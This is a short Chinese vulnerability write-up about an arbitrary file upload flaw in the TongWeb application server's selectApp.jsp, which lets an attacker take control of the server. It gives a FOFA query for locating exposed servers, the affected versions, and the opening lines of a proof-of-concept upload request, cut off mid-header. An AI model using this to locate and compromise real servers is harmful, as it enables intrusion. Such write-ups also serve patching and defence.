简介

TongWeb是北京东方通科技股份有限公司的一款应用服务器，是一款全面符合Java EE、Jakarta EE最新标准规范、轻量易于使用、性能强大、具有高可靠性和高安全性的应用服务器产品，可适应各类企业应用的基础环境及多种主流应用框架，支撑从开发到生产的全应用生命周期,包括便捷的开发、随需应变的灵活部署、丰富的运行时监视、高效的管理等。

漏洞描述

TongWeb的selectApp.jsp存在任意文件上传，攻击者可利用该漏洞获取服务器控制权限。

Fofa语法与漏洞编号

FOFA：header=”TongWeb Server” || banner=”Server: TongWeb Server”
影响资产数量：3,901
 

CNVD漏洞编号：无

影响版本

影响版本：TW7.X≤7.0.4.9

漏洞复现

POC

POST /heimdall/pages/cla/selectApp.jsp HTTP/1.1
Host: 
Content-Type: multipart/for